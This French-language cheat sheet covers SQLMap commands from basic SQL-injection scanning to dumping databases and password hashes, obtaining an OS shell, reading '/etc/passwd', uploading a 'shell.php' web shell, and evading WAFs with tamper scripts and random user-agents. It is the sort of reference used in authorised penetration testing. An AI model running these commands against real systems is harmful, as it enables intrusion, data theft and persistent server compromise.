Objectif : SQLMap est un outil open-source d'audit de sécurité et de test de pénétration qui automatise le processus de détection et d'exploitation des vulnérabilités d'injection SQL, permettant ainsi de prendre le contrôle des serveurs de bases de données.
Source : https://github.com/sqlmapproject/sqlmap | http://sqlmap.org/
OPSEC : SQLMap peut générer un trafic très important et suspect. Son utilisation est facilement détectable par les WAFs (Web Application Firewalls), IDS/IPS et les équipes de sécurité si des précautions (tampers, délais, user-agent aléatoire) ne sont pas prises.
🎯 Ciblage et Scan de Base
Spécifier une URL cible (paramètre GET)
sqlmap -u "[http://exemple.com/produits?id=1](http://exemple.com/produits?id=1)"- Contexte : Lance un scan de base sur l'URL fournie, testant les paramètres GET (ici
id). - Usage : Point d'entrée le plus simple pour tester une URL.
Spécifier une URL cible avec des données POST
sqlmap -u "[http://exemple.com/login](http://exemple.com/login)" --data="username=admin&password=pass"- Contexte : Teste les paramètres envoyés dans le corps d'une requête POST.
- Usage : Pour les formulaires de connexion, de recherche, etc.
Analyser une requête depuis un fichier (Burp Suite, ZAP)
sqlmap -r request.txt- Contexte : Lit une requête HTTP complète (y compris les en-têtes, cookies, méthode POST/GET) depuis un fichier texte.
- Usage : Très pratique pour rejouer et tester des requêtes complexes interceptées avec un proxy comme Burp Suite ou ZAP.
Spécifier un paramètre spécifique à tester
sqlmap -u "[http://exemple.com/produits?id=1&cat=2](http://exemple.com/produits?id=1&cat=2)" -p id- Contexte : Ne teste que le paramètre
idpour l'injection SQL, ignorant les autres (catici). - Usage : Accélérer le scan en se concentrant sur un paramètre jugé potentiellement vulnérable.
Utiliser un cookie d'authentification
sqlmap -u "[http://exemple.com/profil?id=1](http://exemple.com/profil?id=1)" --cookie="sessionid=abcdef12345"- Contexte : Inclut le cookie spécifié dans toutes les requêtes, permettant de tester des pages nécessitant une authentification.
- Usage : Essentiel pour auditer des zones authentifiées d'une application web.
⚙️ Ajustement du Scan (Niveau et Risque)
Augmenter le niveau de test (plus de payloads/types d'injection)
sqlmap -r request.txt --level=5- Contexte : Augmente la profondeur des tests.
levelva de 1 (défaut) à 5 (maximum). Un niveau plus élevé teste plus de types d'injections (ex: time-based blind, injections dans les en-têtes comme User-Agent, Referer). - Usage : Pour des scans plus exhaustifs, mais plus lents et potentiellement plus bruyants.
Augmenter le risque (tests potentiellement plus dangereux)
sqlmap -r request.txt --risk=3- Contexte : Augmente l'agressivité des tests.
riskva de 1 (défaut) à 3 (maximum). Un risque plus élevé utilise des payloads qui pourraient potentiellement modifier des données ou causer des erreurs (ex: injections SQL lourdes). - Usage : À utiliser avec prudence, surtout sur des environnements de production.
[!Astuce] Combiner
--level=5 --risk=3permet le scan le plus complet possible, mais aussi le plus lent et le plus risqué/bruyant.
🔎 Énumération de la Base de Données
Une fois qu'une injection est confirmée, ces commandes permettent d'explorer la structure et le contenu de la base de données.
Lister les bases de données disponibles
sqlmap -r request.txt --dbsLister les tables d'une base de données spécifique
sqlmap -r request.txt -D <nom_db> --tablesLister les colonnes d'une table spécifique
sqlmap -r request.txt -D <nom_db> -T <nom_table> --columnsObtenir l'utilisateur actuel de la base de données
sqlmap -r request.txt --current-userObtenir le nom de la base de données actuelle
sqlmap -r request.txt --current-dbVérifier si l'utilisateur actuel est administrateur (DBA)
sqlmap -r request.txt --is-dbaTenter de dumper les hashes des mots de passe (si possible)
sqlmap -r request.txt --passwords- Prérequis : Nécessite souvent des privilèges élevés et dépend du type de SGBD.
💾 Dump des Données
Dumper le contenu d'une table
sqlmap -r request.txt -D <nom_db> -T <nom_table> --dumpDumper des colonnes spécifiques d'une table
sqlmap -r request.txt -D <nom_db> -T <nom_table> -C <col1,col2> --dumpDumper toutes les tables de toutes les bases de données
sqlmap -r request.txt --dump-all- Usage : Très long et bruyant, à utiliser avec parcimonie.
💥 Exploitation (Accès Système)
[!Attention] Ces actions sont très intrusives et nécessitent généralement que l'utilisateur de la base de données ait des privilèges très élevés (DBA) et que le SGBD soit configuré de manière permissive.
Obtenir un shell interactif sur le système d'exploitation via la base de données
sqlmap -r request.txt --os-shell- Contexte : Tente d'uploader un petit shell (via différentes techniques selon le SGBD :
xp_cmdshellsur MSSQL, UDF sur MySQL/PostgreSQL, etc.) et d'obtenir une invite de commande interactive sur le serveur hébergeant la base de données. - Prérequis : Privilèges DBA, SGBD et OS compatibles.
Exécuter une commande OS unique
sqlmap -r request.txt --os-cmd="<commande>"
# Exemple: sqlmap -r req.txt --os-cmd="whoami"Obtenir un shell SQL interactif
sqlmap -r request.txt --sql-shell- Contexte : Permet d'exécuter des requêtes SQL arbitraires directement sur la base de données.
- Usage : Utile pour une exploration manuelle ou des opérations non prévues par les options de dump standard.
Lire un fichier sur le serveur
sqlmap -r request.txt --file-read "<chemin_fichier_distant>"
# Exemple: sqlmap -r req.txt --file-read "/etc/passwd"- Prérequis : Privilèges de lecture de fichiers pour l'utilisateur de la base de données (ex:
FILEsur MySQL,pg_read_server_filessur PostgreSQL).
Écrire un fichier local sur le serveur
sqlmap -r request.txt --file-write "<fichier_local>" --file-dest "<chemin_destination_distant>"
# Exemple: sqlmap -r req.txt --file-write "shell.php" --file-dest "/var/www/html/uploads/shell.php"- Prérequis : Privilèges d'écriture de fichiers pour l'utilisateur de la base de données.
🛠️ Techniques et Tuning
Forcer une technique d'injection spécifique
sqlmap -r request.txt --technique=<lettre>
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries (rare)
# Exemple: sqlmap -r req.txt --technique=U # Force UNION- Usage : Utile si on sait quel type d'injection fonctionne ou pour accélérer le scan en évitant des techniques inutiles.
Spécifier le SGBD cible
sqlmap -r request.txt --dbms=<sgbd>
# Exemples: --dbms=mysql, --dbms=mssql, --dbms=postgresql, --dbms=oracle- Usage : Accélère le scan en ne testant que les payloads spécifiques au SGBD indiqué.
Augmenter le nombre de threads (parallélisation)
sqlmap -r request.txt --threads=10- Usage : Accélère le scan, mais augmente la charge sur le serveur cible et le risque de détection.
Mode non interactif (répond 'oui' par défaut)
sqlmap -r request.txt --batch- Usage : Utile pour les scans automatisés ou longs où l'on ne souhaite pas répondre manuellement aux questions de SQLMap.
Utiliser un User-Agent aléatoire
sqlmap -r request.txt --random-agent- Usage : Tente de masquer l'empreinte de SQLMap en utilisant des User-Agents variés.
🛡️ Contournement de WAF (Web Application Firewall)
Utiliser des scripts de manipulation (tampers)
sqlmap -r request.txt --tamper=<script1,script2,...>- Contexte : Les tampers modifient les payloads SQL envoyés par SQLMap pour tenter de contourner les règles de détection des WAFs.
- Usage : Essentiel lorsque l'application est protégée par un WAF. Il faut souvent tester plusieurs combinaisons.
- Exemples de tampers courants :
space2comment: Remplace les espaces par/**/.base64encode: Encode le payload en Base64.chardoubleencode: Double encodage URL des caractères.between: Remplace>parNOT BETWEEN 0 AND.randomcase: Change la casse des mots-clés SQL (ex:SELECT->SeLeCt).
- Lister les tampers disponibles :
sqlmap --list-tampers
Ajouter un préfixe/suffixe aux payloads
sqlmap -r request.txt --prefix="')" --suffix="-- -"- Contexte : Ajoute des caractères avant (
prefix) ou après (suffix) le payload injecté. - Usage : Utile pour fermer correctement des guillemets ou des parenthèses dans la requête SQL originale, ou pour commenter la fin de la requête.
Réinitialiser la session SQLMap (vider le cache)
sqlmap -r request.txt --flush-session- Contexte : SQLMap sauvegarde les résultats et les informations de session pour éviter de refaire les mêmes tests.
- Usage : Forcer SQLMap à recommencer les tests depuis le début pour une cible donnée, utile si la configuration a changé ou si on veut essayer des options différentes.